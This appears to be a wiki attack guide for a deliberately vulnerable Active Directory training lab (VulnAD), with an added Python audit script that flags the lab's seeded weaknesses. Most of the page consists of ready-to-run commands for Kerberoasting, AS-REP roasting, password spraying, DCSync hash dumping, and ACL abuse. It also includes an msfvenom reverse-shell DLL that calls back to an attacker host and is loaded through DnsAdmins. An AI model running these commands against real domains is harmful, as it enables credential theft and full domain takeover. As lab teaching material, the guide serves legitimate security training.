
VulnAD Attack Guide

CommonHuman-Lab edited this page Apr 29, 2026 · 1 revision

Full attack reference for the VulnAD lab. All attacks target 127.0.0.1 on the default OctoRig port mappings.

Domain: vulnad.local
DC: 127.0.0.1
Administrator: Administrator / P@ssw0rd123!


Prerequisites

pip install impacket bloodhound

Or use a Kali/ParrotOS box where these are pre-installed.


Enumeration

LDAP — enumerate users

ldapsearch -x -H ldap://127.0.0.1:389 \
  -D "Administrator@vulnad.local" \
  -w 'P@ssw0rd123!' \
  -b "DC=vulnad,DC=local" \
  "(objectClass=user)" sAMAccountName description

Check the description field — 4 users have cleartext passwords stored there.

BloodHound collection

bloodhound-python \
  -u Administrator \
  -p 'P@ssw0rd123!' \
  -d vulnad.local \
  -ns 127.0.0.1 \
  -c All

Import the resulting JSON files into BloodHound to visualise attack paths.


Kerberoasting

Request TGSs for all accounts with SPNs registered:

GetUserSPNs.py vulnad.local/Administrator:'P@ssw0rd123!' \
  -dc-ip 127.0.0.1 \
  -request \
  -outputfile spn_hashes.txt

Crack the resulting hashes:

hashcat -m 13100 spn_hashes.txt /usr/share/wordlists/rockyou.txt

Weak password hint: one of mssql_svc, http_svc, exchange_svc uses a password from rockyou.txt.


AS-REP Roasting

4 users have DONT_REQUIRE_PREAUTH — no password needed to request their AS-REP:

# Enumerate users first (users.txt, one sAMAccountName per line), then roast
GetNPUsers.py vulnad.local/ \
  -usersfile users.txt \
  -dc-ip 127.0.0.1 \
  -no-pass \
  -format hashcat \
  -outputfile asrep_hashes.txt

Crack:

hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
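A defensive counterpart to the LDAP enumeration, Kerberoasting and AS-REP roasting sections above, added here as an example and not part of the lab: a small Python audit that parses an LDIF-style user export and flags the three seeded weaknesses (password-looking descriptions, DONT_REQUIRE_PREAUTH, SPNs on user accounts). It assumes the export also includes userAccountControl and servicePrincipalName (the ldapsearch above requests only sAMAccountName and description); the sample entries and account names are constructed.

```python
# Added defensive audit (not the lab's own code): parse an LDIF-style user export,
# as ldapsearch prints it, and flag the weak settings this lab seeds. Sample is constructed.
import re

UF_DONT_REQUIRE_PREAUTH = 0x400000  # userAccountControl bit behind AS-REP roasting
PASSWORD_HINT = re.compile(r"\b(pass(word)?|pwd|creds?)\b", re.IGNORECASE)

SAMPLE_LDIF = """\
dn: CN=helpdesk1,CN=Users,DC=vulnad,DC=local
sAMAccountName: helpdesk1
description: temp password is Summer2024!

dn: CN=mssql_svc,CN=Users,DC=vulnad,DC=local
sAMAccountName: mssql_svc
servicePrincipalName: MSSQLSvc/db01.vulnad.local:1433

dn: CN=noauth1,CN=Users,DC=vulnad,DC=local
sAMAccountName: noauth1
userAccountControl: 4194816
"""

def parse_ldif(text):
    """Split LDIF text into a list of {attribute: [values]} dicts."""
    entries, current = [], {}
    for line in text.splitlines():
        if not line.strip():          # a blank line ends the current entry
            if current:
                entries.append(current)
            current = {}
            continue
        attr, _, value = line.partition(": ")
        current.setdefault(attr, []).append(value)
    if current:
        entries.append(current)
    return entries

def audit(text):
    """Return {sAMAccountName: [finding, ...]} for every risky account."""
    findings = {}
    for entry in parse_ldif(text):
        name = entry.get("sAMAccountName", ["?"])[0]
        issues = ["password hint in description"
                  for d in entry.get("description", []) if PASSWORD_HINT.search(d)]
        if int(entry.get("userAccountControl", ["0"])[0]) & UF_DONT_REQUIRE_PREAUTH:
            issues.append("DONT_REQUIRE_PREAUTH set (AS-REP roastable)")
        if entry.get("servicePrincipalName"):
            issues.append("SPN on user account (Kerberoastable)")
        if issues:
            findings[name] = issues
    return findings
```

Run it against a real export by reading the ldapsearch output file and calling audit() on its contents; each flagged account is one that should be cleaned up (description cleared, pre-auth re-enabled, or the service account moved to a gMSA or a long random password).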

Password Spraying

8 users share the password ncc1701:

# SMB is mapped to 4445 in this lab; the port is --port, -p is the password
crackmapexec smb 127.0.0.1 --port 4445 \
  -u users.txt \
  -p 'ncc1701' \
  --continue-on-success

DCSync

3 users have Replicating Directory Changes ACEs — use them to dump hashes:

secretsdump.py vulnad.local/dcsync_user:'<password>'@127.0.0.1

Or with a discovered NTLM hash (pass-the-hash):

secretsdump.py -hashes :<ntlm_hash> vulnad.local/dcsync_user@127.0.0.1

DnsAdmins Abuse

Users in DnsAdmins can load an arbitrary DLL into the DNS service (runs as SYSTEM):

# Build a malicious DLL (msfvenom or custom)
msfvenom -p windows/x64/shell_reverse_tcp \
  LHOST=<your_ip> LPORT=4444 \
  -f dll -o evil.dll

# Set the DLL on the DNS server (requires DnsAdmins membership);
# quote the UNC path so the shell does not strip the backslashes
dnscmd.py vulnad.local/dns_admin_user:'<password>'@127.0.0.1 \
  /config /serverlevelplugindll '\\attacker\share\evil.dll'

# Restart DNS service to trigger load

In the Docker/Samba4 environment, DNS service restart behaviour may differ from a Windows DC. Use BloodHound to confirm the path is traversable before attempting.


ACL Abuse (GenericAll / WriteDACL chain)

The seeded ACL chain: Normal group → Mid group → High group

Use BloodHound to identify the chain, then abuse with:

# GenericAll on a user — force password reset
net rpc password <target_user> <new_password> \
  -U vulnad.local/<controlling_user>%<password> \
  -S 127.0.0.1

# WriteDACL — grant yourself DCSync rights
dacledit.py -action write \
  -rights DCSync \
  -principal <your_user> \
  -target-dn "DC=vulnad,DC=local" \
  vulnad.local/<controlling_user>:'<password>'

Credential Reference

| Username | Password | Attack Path |
| --- | --- | --- |
| Administrator | P@ssw0rd123! | Full domain admin |
| mssql_svc / http_svc / exchange_svc | weak (crack from TGS) | Kerberoasting |
| 4 × AS-REP users | weak (crack from AS-REP) | AS-REP Roasting |
| 8 × spray users | ncc1701 | Password spraying |
| 3 × default users | Changeme123! | Default credentials |
| 4 × description users | see LDAP description field | LDAP enumeration |
| 3 × DCSync users | | DCSync after compromise |
